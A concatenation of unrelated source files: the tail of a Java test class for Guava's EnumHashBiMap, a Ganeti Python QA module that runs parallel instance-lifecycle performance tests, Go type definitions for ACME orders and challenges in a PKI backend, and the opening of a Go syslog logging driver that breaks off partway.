    assertEquals(Currency.DOLLAR, bimap.inverse().get("dollar"));

    /* Map must have at least one entry if not an EnumHashBiMap. */
    assertThrows(
        IllegalArgumentException.class,
        () -> EnumHashBiMap.create(Collections.<Currency, String>emptyMap()));

    /* Map can be empty if it's an EnumHashBiMap. */
    Map<Currency, String> emptyBimap = EnumHashBiMap.create(Currency.class);
    bimap = EnumHashBiMap.create(emptyBimap);
    assertTrue(bimap.isEmpty());

    /* Map can be empty if it's an EnumBiMap. */
    Map<Currency, Country> emptyBimap2 = EnumBiMap.create(Currency.class, Country.class);
    EnumHashBiMap<Currency, Country> bimap2 = EnumHashBiMap.create(emptyBimap2);
    assertTrue(bimap2.isEmpty());
  }

  public void testEnumHashBiMapConstructor() {
    /* Test that it copies existing entries. */
    EnumHashBiMap<Currency, String> bimap1 = EnumHashBiMap.create(Currency.class);
    bimap1.put(Currency.DOLLAR, "dollar");
    EnumHashBiMap<Currency, String> bimap2 = EnumHashBiMap.create(bimap1);
    assertEquals("dollar", bimap2.get(Currency.DOLLAR));
    assertEquals(bimap1, bimap2);
    // The copy must be independent: mutating it must not affect the source.
    bimap2.inverse().put("franc", Currency.FRANC);
    assertEquals("franc", bimap2.get(Currency.FRANC));
    assertThat(bimap1.get(Currency.FRANC)).isNull();
    assertFalse(bimap2.equals(bimap1));

    /* Test that it can be empty. */
    EnumHashBiMap<Currency, String> emptyBimap = EnumHashBiMap.create(Currency.class);
    EnumHashBiMap<Currency, String> bimap3 = EnumHashBiMap.create(emptyBimap);
    assertEquals(bimap3, emptyBimap);
  }

  public void testEnumBiMapConstructor() {
    /* Test that it copies existing entries. */
    EnumBiMap<Currency, Country> bimap1 = EnumBiMap.create(Currency.class, Country.class);
    bimap1.put(Currency.DOLLAR, Country.SWITZERLAND);
    EnumHashBiMap<Currency, Object> bimap2 = // use supertype
        EnumHashBiMap.<Currency, Object>create(bimap1);
    assertEquals(Country.SWITZERLAND, bimap2.get(Currency.DOLLAR));
    assertEquals(bimap1, bimap2);
    // The copy must be independent: mutating it must not affect the source.
    bimap2.inverse().put("franc", Currency.FRANC);
    assertEquals("franc", bimap2.get(Currency.FRANC));
    assertThat(bimap1.get(Currency.FRANC)).isNull();
    assertFalse(bimap2.equals(bimap1));

    /* Test that it can be empty. */
    EnumBiMap<Currency, Country> emptyBimap = EnumBiMap.create(Currency.class, Country.class);
    EnumHashBiMap<Currency, Country> bimap3 = // use exact type
        EnumHashBiMap.create(emptyBimap);
    assertEquals(bimap3, emptyBimap);
  }

  @GwtIncompatible // keyType
  public void testKeyType() {
    EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(Currency.class);
    assertEquals(Currency.class, bimap.keyType());
  }

  public void testEntrySet() {
    // Bug 3168290: entrySet() must return distinct entry objects, not reuse
    // a single mutable entry (checked via an identity-based set).
    Map<Currency, String> map =
        ImmutableMap.of(
            Currency.DOLLAR, "dollar",
            Currency.PESO, "peso",
            Currency.FRANC, "franc");
    EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(map);
    Set<Object> uniqueEntries = Sets.newIdentityHashSet();
    uniqueEntries.addAll(bimap.entrySet());
    assertEquals(3, uniqueEntries.size());
  }

  @GwtIncompatible
  @J2ktIncompatible
  public void testSerializable() {
    SerializableTester.reserializeAndAssert(EnumHashBiMap.create(Currency.class));
  }

  @J2ktIncompatible
  @GwtIncompatible // reflection
  public void testNulls() {
    new NullPointerTester().testAllPublicStaticMethods(EnumHashBiMap.class);
    new NullPointerTester().testAllPublicInstanceMethods(EnumHashBiMap.create(Currency.class));
  }
}
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Performance testing QA tests.
"""
import datetime
import functools
import itertools
import threading
import time
from ganeti import constants
from qa import qa_config
from qa import qa_error
from qa_instance_utils import GetGenericAddParameters
from qa import qa_job_utils
from qa import qa_logging
from qa import qa_utils
MAX_JOB_SUBMISSION_DURATION = 15.0
class _JobQueueDriver(object):
  """This class handles polling of jobs and reacting on status changes.
  Jobs are added via the L{AddJob} method, and can have callback functions
  assigned to them. Those are called as soon as the job enters the appropriate
  state. Callback functions can add new jobs to the driver as needed.
  A call to L{WaitForCompletion} finally polls Ganeti until all jobs have
  succeeded.
  """
  # Placeholder status for jobs whose real state has not been fetched yet
  _UNKNOWN_STATUS = "unknown"
  class _JobEntry(object):
    """Internal class representing a job entry.
    """
    def __init__(self, job_id, running_fn, success_fn):
      self.job_id = job_id
      self.running_fn = running_fn
      self.success_fn = success_fn
    def __str__(self):
      return str(self.job_id)
  def __init__(self):
    self._jobs = {}
    self._running_notified = set()
    self._jobs_per_status = {}
    self._lock = threading.RLock()
  def AddJob(self, job_id, running_fn=None, success_fn=None):
    """Add a job to the driver.
    @type job_id: of ints
    @param job_id: job id to add to the driver
    @type running_fn: function taking a L{_JobQueueDriver} and an int
    @param running_fn: function called once when a job changes to running state
                       (or success state, if the running state was too short)
    @type success_fn: function taking a L{_JobQueueDriver} and an int
    @param success_fn: function called for each successful job id
    """
    with self._lock:
      self._jobs[job_id] = _JobQueueDriver._JobEntry(job_id,
                                                     running_fn,
                                                     success_fn)
      # the status will be updated on the next call to _FetchJobStatuses
      self._jobs_per_status.setdefault(self._UNKNOWN_STATUS, []).append(job_id)
  def _FetchJobStatuses(self):
    """Retrieves status information of the given jobs.
    """
    job_statuses = qa_job_utils.GetJobStatuses(self._GetJobIds())
    new_statuses = {}
    for job_id, status in job_statuses.items():
      new_statuses.setdefault(status, []).append(self._jobs[int(job_id)])
    self._jobs_per_status = new_statuses
  def _GetJobIds(self):
    return list(self._jobs)
  def _GetJobsInStatuses(self, statuses):
    """Returns a list of L{_JobEntry} of all jobs in the given statuses.
    @type statuses: iterable of strings
    @param statuses: jobs in those statuses are returned
    @rtype: list of L{_JobEntry}
    @return: list of job entries in the requested statuses
    """
    ret = []
    for state in statuses:
      ret.extend(self._jobs_per_status.get(state, []))
    return ret
  def _UpdateJobStatuses(self):
    """Retrieves job statuses from the cluster and updates internal state.
    """
    self._FetchJobStatuses()
    error_jobs = self._GetJobsInStatuses([constants.JOB_STATUS_ERROR])
    if error_jobs:
      raise qa_error.Error(
        "Jobs %s are in error state!" % [job.job_id for job in error_jobs])
    for job in self._GetJobsInStatuses([constants.JOB_STATUS_RUNNING,
                                        constants.JOB_STATUS_SUCCESS]):
      if job.job_id not in self._running_notified:
        # fire the running callback at most once per job
        if job.running_fn is not None:
          job.running_fn(self, job.job_id)
        self._running_notified.add(job.job_id)
    for job in self._GetJobsInStatuses([constants.JOB_STATUS_SUCCESS]):
      if job.success_fn is not None:
        job.success_fn(self, job.job_id)
      # we're done with this job
      del self._jobs[job.job_id]
  def _HasPendingJobs(self):
    """Checks if there are still jobs pending.
    @rtype: bool
    @return: C{True} if there are still jobs which have not succeeded
    """
    with self._lock:
      self._UpdateJobStatuses()
      uncompleted_jobs = self._GetJobsInStatuses(
        constants.JOB_STATUS_ALL - constants.JOBS_FINALIZED)
      unknown_jobs = self._GetJobsInStatuses([self._UNKNOWN_STATUS])
      return len(uncompleted_jobs) > 0 or len(unknown_jobs) > 0
  def WaitForCompletion(self):
    """Wait for the completion of all registered jobs.
    """
    while self._HasPendingJobs():
      time.sleep(2)
    with self._lock:
      if self._jobs:
        raise qa_error.Error(
          "Jobs %s didn't finish in success state!" % self._GetJobIds())
def _AcquireAllInstances():
  """Generator yielding QA config instances until the pool is exhausted.
  """
  try:
    while True:
      yield qa_config.AcquireInstance()
  except qa_error.OutOfInstancesError:
    pass
def _AcquireAllNodes():
  """Generator yielding QA config nodes until no more can be acquired.
  Already-acquired nodes are excluded from subsequent acquisitions.
  """
  acquired = []
  try:
    while True:
      acquired.append(qa_config.AcquireNode(exclude=acquired))
      yield acquired[-1]
  except qa_error.OutOfNodesError:
    pass
def _ExecuteJobSubmittingCmd(cmd):
  """Executes a job submitting command and returns the resulting job ID.
  A warning is printed if submitting the job takes longer than
  L{MAX_JOB_SUBMISSION_DURATION}.
  @type cmd: list of string or string
  @param cmd: the job producing command to execute on the cluster
  @rtype: int
  @return: job-id
  """
  started_at = datetime.datetime.now()
  job_id = qa_job_utils.ExecuteJobProducingCommand(cmd)
  elapsed = qa_utils.TimedeltaToTotalSeconds(datetime.datetime.now() - started_at)
  if elapsed > MAX_JOB_SUBMISSION_DURATION:
    print(qa_logging.FormatWarning(
      "Executing '%s' took %f seconds, a maximum of %f was expected" %
      (cmd, elapsed, MAX_JOB_SUBMISSION_DURATION)))
  return job_id
def _SubmitInstanceCreationJob(instance, disk_template=None):
  """Submit an instance creation job.
  @type instance: L{qa_config._QaInstance}
  @param instance: instance to submit a create command for
  @type disk_template: string
  @param disk_template: disk template for the new instance or C{None} which
                        causes the default disk template to be used
  @rtype: int
  @return: job id of the submitted creation job
  """
  if disk_template is None:
    disk_template = qa_config.GetDefaultDiskTemplate()
  try:
    cmd = (["gnt-instance", "add", "--submit", "--opportunistic-locking",
            "--os-type=%s" % qa_config.get("os"),
            "--disk-template=%s" % disk_template] +
           GetGenericAddParameters(instance, disk_template))
    cmd.append(instance.name)
    instance.SetDiskTemplate(disk_template)
    return _ExecuteJobSubmittingCmd(cmd)
  except:
    # Return the instance to the QA pool on any failure; on success the
    # caller takes ownership and is responsible for releasing it.
    instance.Release()
    raise
def _SubmitInstanceRemoveJob(instance):
  """Submit an instance remove job.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to remove
  @rtype: int
  @return: job id of the submitted remove job
  """
  try:
    cmd = (["gnt-instance", "remove", "--submit", "-f"])
    cmd.append(instance.name)
    return _ExecuteJobSubmittingCmd(cmd)
  finally:
    # Release unconditionally: once removal is submitted (or submission
    # failed) QA no longer needs this instance slot.
    instance.Release()
def _TestParallelInstanceCreationAndRemoval(max_instances=None,
                                            disk_template=None,
                                            custom_job_driver=None):
  """Tests parallel creation and immediate removal of instances.
  @type max_instances: int
  @param max_instances: maximum number of instances to create
  @type disk_template: string
  @param disk_template: disk template for the new instances or C{None} which
                        causes the default disk template to be used
  @type custom_job_driver: _JobQueueDriver
  @param custom_job_driver: a custom L{_JobQueueDriver} to use if not L{None}.
                            If one is specified, C{WaitForCompletion} is _not_
                            called on it.
  """
  job_driver = custom_job_driver or _JobQueueDriver()
  # As soon as an instance was created successfully, submit its removal.
  def _CreateSuccessFn(instance, job_driver, _):
    job_id = _SubmitInstanceRemoveJob(instance)
    job_driver.AddJob(job_id)
  instance_generator = _AcquireAllInstances()
  if max_instances is not None:
    instance_generator = itertools.islice(instance_generator, max_instances)
  for instance in instance_generator:
    job_id = _SubmitInstanceCreationJob(instance, disk_template=disk_template)
    job_driver.AddJob(
      job_id, success_fn=functools.partial(_CreateSuccessFn, instance))
  if custom_job_driver is None:
    job_driver.WaitForCompletion()
def TestParallelMaxInstanceCreationPerformance():
  """PERFORMANCE: Parallel instance creation (instance count = max).
  Creates as many instances as the QA config provides, each removed again
  right after its creation succeeds.
  """
  _TestParallelInstanceCreationAndRemoval()
def TestParallelNodeCountInstanceCreationPerformance():
  """PERFORMANCE: Parallel instance creation (instance count = node count).
  Acquires all QA nodes, runs one parallel create-and-remove per node, and
  always returns the nodes to the QA pool afterwards.
  """
  nodes = list(_AcquireAllNodes())
  try:
    _TestParallelInstanceCreationAndRemoval(max_instances=len(nodes))
  finally:
    # Previously the nodes leaked if the test raised; release them
    # unconditionally so later QA tests can acquire them again.
    qa_config.ReleaseManyNodes(nodes)
def CreateAllInstances():
  """Create all instances configured in QA config in the cluster.
  @rtype: list of L{qa_config._QaInstance}
  @return: list of instances created in the cluster
  """
  driver = _JobQueueDriver()
  acquired = list(_AcquireAllInstances())
  for inst in acquired:
    driver.AddJob(_SubmitInstanceCreationJob(inst))
  driver.WaitForCompletion()
  return acquired
def RemoveAllInstances(instances):
  """Removes all given instances from the cluster.
  @type instances: list of L{qa_config._QaInstance}
  @param instances: instances to remove
  """
  driver = _JobQueueDriver()
  for inst in instances:
    driver.AddJob(_SubmitInstanceRemoveJob(inst))
  driver.WaitForCompletion()
def TestParallelModify(instances):
  """PERFORMANCE: Parallel instance modify.
  Submits three concurrent modify jobs per instance: backend parameter only,
  OS parameter only, and both combined.
  @type instances: list of L{qa_config._QaInstance}
  @param instances: list of instances to issue modify commands against
  """
  job_driver = _JobQueueDriver()
  # set min mem to same value as max mem
  new_min_mem = qa_config.get(constants.BE_MAXMEM)
  for instance in instances:
    cmd = (["gnt-instance", "modify", "--submit",
            "-B", "%s=%s" % (constants.BE_MINMEM, new_min_mem)])
    cmd.append(instance.name)
    job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
    cmd = (["gnt-instance", "modify", "--submit",
            "-O", "fake_os_param=fake_value"])
    cmd.append(instance.name)
    job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
    cmd = (["gnt-instance", "modify", "--submit",
            "-O", "fake_os_param=fake_value",
            "-B", "%s=%s" % (constants.BE_MINMEM, new_min_mem)])
    cmd.append(instance.name)
    job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
  job_driver.WaitForCompletion()
def TestParallelInstanceOSOperations(instances):
  """PERFORMANCE: Parallel instance OS operations.
  Note: This test leaves the instances either running or stopped, there's no
  guarantee on the actual status.
  @type instances: list of L{qa_config._QaInstance}
  @param instances: list of instances to issue lifecycle commands against
  """
  OPS = ["start", "shutdown", "reboot", "reinstall"]
  job_driver = _JobQueueDriver()
  # Chains lifecycle operations per instance: as soon as the job for
  # operation `idx` starts running, the job for `idx + 1` is submitted.
  # Each instance starts at a different offset into OPS (see the loop below)
  # so the operations are mixed across instances.
  def _SubmitNextOperation(instance, start, idx, job_driver, _):
    if idx == len(OPS):
      return
    op_idx = (start + idx) % len(OPS)
    next_fn = functools.partial(_SubmitNextOperation, instance, start, idx + 1)
    if OPS[op_idx] == "reinstall" and \
        instance.disk_template == constants.DT_DISKLESS:
      # no reinstall possible with diskless instances
      next_fn(job_driver, None)
      return
    elif OPS[op_idx] == "reinstall":
      # the instance has to be shut down for reinstall to work
      shutdown_cmd = ["gnt-instance", "shutdown", "--submit", instance.name]
      cmd = ["gnt-instance", "reinstall", "--submit", "-f", instance.name]
      job_driver.AddJob(_ExecuteJobSubmittingCmd(shutdown_cmd),
                        running_fn=lambda _, __: job_driver.AddJob(
                          _ExecuteJobSubmittingCmd(cmd),
                          running_fn=next_fn))
    else:
      cmd = ["gnt-instance", OPS[op_idx], "--submit"]
      if OPS[op_idx] == "reinstall":
        cmd.append("-f")
      cmd.append(instance.name)
      job_id = _ExecuteJobSubmittingCmd(cmd)
      job_driver.AddJob(job_id, running_fn=next_fn)
  for start, instance in enumerate(instances):
    _SubmitNextOperation(instance, start % len(OPS), 0, job_driver, None)
  job_driver.WaitForCompletion()
def TestParallelInstanceQueries(instances):
  """PERFORMANCE: Parallel instance queries.
  For every instance, issues a "gnt-instance info" and a "gnt-instance list"
  query concurrently, then waits for all of them.
  @type instances: list of L{qa_config._QaInstance}
  @param instances: list of instances to issue queries against
  """
  group = qa_job_utils.QAThreadGroup()
  for inst in instances:
    group.Start(qa_job_utils.QAThread(
      qa_utils.AssertCommand, [["gnt-instance", "info", inst.name]], {}))
    group.Start(qa_job_utils.QAThread(
      qa_utils.AssertCommand, [["gnt-instance", "list"]], {}))
  group.JoinAndReraise()
def TestJobQueueSubmissionPerformance():
  """PERFORMANCE: Job queue submission performance.
  This test exercises the job queue and verifies that the job submission time
  does not increase as more jobs are added.
  """
  MAX_CLUSTER_INFO_SECONDS = 15.0
  job_driver = _JobQueueDriver()
  submission_durations = []
  def _VerifySubmissionDuration(duration_seconds):
    # only start to verify the submission duration once we got data from the
    # first 10 job submissions
    if len(submission_durations) >= 10:
      avg_duration = sum(submission_durations) / len(submission_durations)
      # warn when a submission takes more than 1.5x the baseline average
      max_duration = avg_duration * 1.5
      if duration_seconds > max_duration:
        print(qa_logging.FormatWarning(
          "Submitting a delay job took %f seconds, max %f expected" %
          (duration_seconds, max_duration)))
    else:
      submission_durations.append(duration_seconds)
  def _SubmitDelayJob(count):
    for _ in range(count):
      cmd = ["gnt-debug", "delay", "--submit", "0.1"]
      start = datetime.datetime.now()
      job_id = _ExecuteJobSubmittingCmd(cmd)
      duration_seconds = \
        qa_utils.TimedeltaToTotalSeconds(datetime.datetime.now() - start)
      _VerifySubmissionDuration(duration_seconds)
      job_driver.AddJob(job_id)
  # 10 threads x 20 jobs each = 200 delay jobs submitted in parallel
  threads = qa_job_utils.QAThreadGroup()
  for _ in range(10):
    thread = qa_job_utils.QAThread(_SubmitDelayJob, [20], {})
    threads.Start(thread)
  threads.JoinAndReraise()
  # the master must stay responsive while the jobs run
  qa_utils.AssertCommand(["gnt-cluster", "info"],
                         max_seconds=MAX_CLUSTER_INFO_SECONDS)
  job_driver.WaitForCompletion()
def TestParallelDRBDInstanceCreationPerformance():
  """PERFORMANCE: Parallel DRBD backed instance creation.
  Creates two DRBD instances per node in parallel and always returns the
  acquired nodes to the QA pool afterwards.
  """
  assert qa_config.IsTemplateSupported(constants.DT_DRBD8)
  nodes = list(_AcquireAllNodes())
  try:
    _TestParallelInstanceCreationAndRemoval(max_instances=len(nodes) * 2,
                                            disk_template=constants.DT_DRBD8)
  finally:
    # Previously the nodes leaked if the test raised; release them
    # unconditionally so later QA tests can acquire them again.
    qa_config.ReleaseManyNodes(nodes)
def TestParallelPlainInstanceCreationPerformance():
  """PERFORMANCE: Parallel plain backed instance creation.
  Creates two plain (LVM) instances per node in parallel and always returns
  the acquired nodes to the QA pool afterwards.
  """
  assert qa_config.IsTemplateSupported(constants.DT_PLAIN)
  nodes = list(_AcquireAllNodes())
  try:
    _TestParallelInstanceCreationAndRemoval(max_instances=len(nodes) * 2,
                                            disk_template=constants.DT_PLAIN)
  finally:
    # Previously the nodes leaked if the test raised; release them
    # unconditionally so later QA tests can acquire them again.
    qa_config.ReleaseManyNodes(nodes)
def _TestInstanceOperationInParallelToInstanceCreation(*cmds):
  """Run the given test command in parallel to an instance creation.
  @type cmds: list of list of strings
  @param cmds: commands to execute in parallel to an instance creation. Each
               command in the list is executed once the previous job starts
               to run.
  """
  # Submits cmds[cmd_idx] and chains submission of the next command to the
  # success of the resulting job.
  def _SubmitNextCommand(cmd_idx, job_driver, _):
    if cmd_idx >= len(cmds):
      return
    job_id = _ExecuteJobSubmittingCmd(cmds[cmd_idx])
    job_driver.AddJob(
      job_id, success_fn=functools.partial(_SubmitNextCommand, cmd_idx + 1))
  assert qa_config.IsTemplateSupported(constants.DT_DRBD8)
  assert len(cmds) > 0
  job_driver = _JobQueueDriver()
  _SubmitNextCommand(0, job_driver, None)
  # one DRBD instance is created/removed while the command chain runs
  _TestParallelInstanceCreationAndRemoval(max_instances=1,
                                          disk_template=constants.DT_DRBD8,
                                          custom_job_driver=job_driver)
  job_driver.WaitForCompletion()
def TestParallelInstanceFailover(instance):
  """PERFORMANCE: Instance failover with parallel instance creation.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to fail over
  """
  _TestInstanceOperationInParallelToInstanceCreation(
    ["gnt-instance", "failover", "--submit", "-f", "--shutdown-timeout=0",
     instance.name])
def TestParallelInstanceMigration(instance):
  """PERFORMANCE: Instance migration with parallel instance creation.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to migrate
  """
  _TestInstanceOperationInParallelToInstanceCreation(
    ["gnt-instance", "migrate", "--submit", "-f", instance.name])
def TestParallelInstanceReplaceDisks(instance):
  """PERFORMANCE: Instance replace-disks with parallel instance creation.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance whose disks are replaced
  """
  _TestInstanceOperationInParallelToInstanceCreation(
    ["gnt-instance", "replace-disks", "--submit", "--early-release", "-p",
     instance.name])
def TestParallelInstanceReboot(instance):
  """PERFORMANCE: Instance reboot with parallel instance creation.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to reboot
  """
  _TestInstanceOperationInParallelToInstanceCreation(
    ["gnt-instance", "reboot", "--submit", instance.name])
def TestParallelInstanceReinstall(instance):
  """PERFORMANCE: Instance reinstall with parallel instance creation.
  The instance is stopped before and started again after the reinstall.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to reinstall
  """
  # instance reinstall requires the instance to be down
  qa_utils.AssertCommand(["gnt-instance", "stop", instance.name])
  _TestInstanceOperationInParallelToInstanceCreation(
    ["gnt-instance", "reinstall", "--submit", "-f", instance.name])
  qa_utils.AssertCommand(["gnt-instance", "start", instance.name])
def TestParallelInstanceRename(instance):
  """PERFORMANCE: Instance rename with parallel instance creation.
  @type instance: L{qa_config._QaInstance}
  @param instance: the instance to rename
  """
  # instance rename requires the instance to be down
  qa_utils.AssertCommand(["gnt-instance", "stop", instance.name])
  new_instance = qa_config.AcquireInstance()
  try:
    # rename back and forth so the instance keeps its original name
    _TestInstanceOperationInParallelToInstanceCreation(
      ["gnt-instance", "rename", "--submit", instance.name, new_instance.name],
      ["gnt-instance", "rename", "--submit", new_instance.name, instance.name])
  finally:
    new_instance.Release()
  qa_utils.AssertCommand(["gnt-instance", "start", instance.name])
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: BUSL-1.1
package pki
import (
"fmt"
"time"
)
// ACMEIdentifierType is the RFC 8555 identifier type ("dns" or "ip").
type ACMEIdentifierType string
const (
	ACMEDNSIdentifier ACMEIdentifierType = "dns"
	ACMEIPIdentifier  ACMEIdentifierType = "ip"
)
// ACMEIdentifier is the stored form of an order/authorization identifier.
type ACMEIdentifier struct {
	Type  ACMEIdentifierType `json:"type"`
	Value string             `json:"value"`
	// OriginalValue keeps the value exactly as submitted by the client;
	// Value may be rewritten (e.g. wildcard reduction in MaybeParseWildcard).
	OriginalValue string `json:"original_value"`
	IsWildcard    bool   `json:"is_wildcard"`
	IsV6IP        bool   `json:"is_v6_ip"`
}
// MaybeParseWildcard detects and normalizes a wildcard DNS identifier.
// It returns (isWildcard, reducedName, err). For "*.example.com" it sets
// ai.IsWildcard and stores the name without the leading "*." back into
// ai.Value; non-DNS or non-wildcard identifiers are returned unchanged.
func (ai *ACMEIdentifier) MaybeParseWildcard() (bool, string, error) {
	if ai.Type != ACMEDNSIdentifier || !isWildcardDomain(ai.Value) {
		return false, ai.Value, nil
	}
	// Here on out, technically it is a wildcard.
	ai.IsWildcard = true
	wildcardLabel, reducedName, err := validateWildcardDomain(ai.Value)
	if err != nil {
		return true, "", err
	}
	if wildcardLabel != "*" {
		// Per RFC 8555 Section. 7.1.3. Order Objects:
		//
		// > Any identifier of type "dns" in a newOrder request MAY have a
		// > wildcard domain name as its value. A wildcard domain name consists
		// > of a single asterisk character followed by a single full stop
		// > character ("*.") followed by a domain name as defined for use in the
		// > Subject Alternate Name Extension by [RFC5280].
		return true, "", fmt.Errorf("wildcard must be entire left-most label")
	}
	if reducedName == "" {
		return true, "", fmt.Errorf("wildcard must not be entire domain name; need at least two domain labels")
	}
	// Parsing was indeed successful, so update our reduced name.
	ai.Value = reducedName
	return true, reducedName, nil
}
// NetworkMarshal renders the identifier in RFC 8555 wire format. When
// useOriginalValue is true the client-submitted value is emitted instead of
// the (possibly rewritten) internal value.
func (ai *ACMEIdentifier) NetworkMarshal(useOriginalValue bool) map[string]interface{} {
	v := ai.Value
	if useOriginalValue {
		v = ai.OriginalValue
	}
	return map[string]interface{}{
		"type":  ai.Type,
		"value": v,
	}
}
// ACMEAuthorizationStatusType enumerates RFC 8555 authorization states.
type ACMEAuthorizationStatusType string
const (
	ACMEAuthorizationPending     ACMEAuthorizationStatusType = "pending"
	ACMEAuthorizationValid       ACMEAuthorizationStatusType = "valid"
	ACMEAuthorizationInvalid     ACMEAuthorizationStatusType = "invalid"
	ACMEAuthorizationDeactivated ACMEAuthorizationStatusType = "deactivated"
	ACMEAuthorizationExpired     ACMEAuthorizationStatusType = "expired"
	ACMEAuthorizationRevoked     ACMEAuthorizationStatusType = "revoked"
)
// ACMEOrderStatusType enumerates RFC 8555 order states.
type ACMEOrderStatusType string
const (
	ACMEOrderPending    ACMEOrderStatusType = "pending"
	ACMEOrderProcessing ACMEOrderStatusType = "processing"
	ACMEOrderValid      ACMEOrderStatusType = "valid"
	ACMEOrderInvalid    ACMEOrderStatusType = "invalid"
	ACMEOrderReady      ACMEOrderStatusType = "ready"
)
// ACMEChallengeType enumerates the supported challenge mechanisms.
type ACMEChallengeType string
const (
	ACMEHTTPChallenge ACMEChallengeType = "http-01"
	ACMEDNSChallenge  ACMEChallengeType = "dns-01"
	ACMEALPNChallenge ACMEChallengeType = "tls-alpn-01"
)
// ACMEChallengeStatusType enumerates RFC 8555 challenge states.
type ACMEChallengeStatusType string
const (
	ACMEChallengePending    ACMEChallengeStatusType = "pending"
	ACMEChallengeProcessing ACMEChallengeStatusType = "processing"
	ACMEChallengeValid      ACMEChallengeStatusType = "valid"
	ACMEChallengeInvalid    ACMEChallengeStatusType = "invalid"
)
// ACMEChallenge is the stored form of a single challenge.
type ACMEChallenge struct {
	Type      ACMEChallengeType       `json:"type"`
	Status    ACMEChallengeStatusType `json:"status"`
	Validated string                  `json:"validated,optional"`
	Error     map[string]interface{}  `json:"error,optional"`
	// ChallengeFields holds extra type-specific fields that are merged into
	// the network form by NetworkMarshal.
	ChallengeFields map[string]interface{} `json:"challenge_fields"`
}
// NetworkMarshal renders the challenge in RFC 8555 wire format, including a
// URL derived from the request context and owning authorization id.
// "validated"/"error" appear only when set; ChallengeFields are merged last
// and therefore take precedence over same-named keys.
func (ac *ACMEChallenge) NetworkMarshal(acmeCtx *acmeContext, authId string) map[string]interface{} {
	out := make(map[string]interface{})
	out["type"] = ac.Type
	out["url"] = buildChallengeUrl(acmeCtx, authId, string(ac.Type))
	out["status"] = ac.Status
	if ac.Validated != "" {
		out["validated"] = ac.Validated
	}
	if len(ac.Error) > 0 {
		out["error"] = ac.Error
	}
	for k, v := range ac.ChallengeFields {
		out[k] = v
	}
	return out
}
// buildChallengeUrl returns the public URL of a challenge, derived from the
// request's base URL, the authorization id and the challenge type.
func buildChallengeUrl(acmeCtx *acmeContext, authId, challengeType string) string {
	return acmeCtx.baseUrl.JoinPath("/challenge/", authId, challengeType).String()
}
// ACMEAuthorization is the stored form of an RFC 8555 authorization object
// plus bookkeeping fields (Id, AccountId).
type ACMEAuthorization struct {
	Id         string                      `json:"id"`
	AccountId  string                      `json:"account_id"`
	Identifier *ACMEIdentifier             `json:"identifier"`
	Status     ACMEAuthorizationStatusType `json:"status"`
	// Per RFC 8555 Section 7.1.4. Authorization Objects:
	//
	// > This field is REQUIRED for objects with "valid" in the "status"
	// > field.
	Expires    string           `json:"expires,optional"`
	Challenges []*ACMEChallenge `json:"challenges"`
	Wildcard   bool             `json:"wildcard"`
}
// GetExpires parses the RFC 3339 expiry timestamp of the authorization.
// An unset Expires field yields the zero time and no error.
func (aa *ACMEAuthorization) GetExpires() (time.Time, error) {
	if len(aa.Expires) == 0 {
		return time.Time{}, nil
	}
	return time.Parse(time.RFC3339, aa.Expires)
}
// NetworkMarshal renders the authorization in RFC 8555 wire format.
// "expires" is only emitted when set; challenges get their URLs from acmeCtx.
func (aa *ACMEAuthorization) NetworkMarshal(acmeCtx *acmeContext) map[string]interface{} {
	resp := map[string]interface{}{
		"identifier": aa.Identifier.NetworkMarshal( /* use value, not original value */ false),
		"status":     aa.Status,
		"wildcard":   aa.Wildcard,
	}
	if aa.Expires != "" {
		resp["expires"] = aa.Expires
	}
	if len(aa.Challenges) > 0 {
		challenges := []map[string]interface{}{}
		for _, challenge := range aa.Challenges {
			challenges = append(challenges, challenge.NetworkMarshal(acmeCtx, aa.Id))
		}
		resp["challenges"] = challenges
	}
	return resp
}
// Package syslog provides the logdriver for forwarding server logs to syslog endpoints.
package syslog
import (
"crypto/tls"
"errors"
"fmt"
"net"
"net/url"
"os"
"strconv"
"strings"
"time"
syslog "github.com/RackSec/srslog"
"github.com/docker/go-connections/tlsconfig"
"github.com/moby/moby/v2/daemon/logger"
"github.com/moby/moby/v2/daemon/logger/loggerutils"
)
const (
name = "syslog"
secureProto = "tcp+tls"
defaultPort = "514"
)
// facilities maps the names accepted in the "syslog-facility" log option to
// their srslog priority values.
var facilities = map[string]syslog.Priority{
	"kern":     syslog.LOG_KERN,
	"user":     syslog.LOG_USER,
	"mail":     syslog.LOG_MAIL,
	"daemon":   syslog.LOG_DAEMON,
	"auth":     syslog.LOG_AUTH,
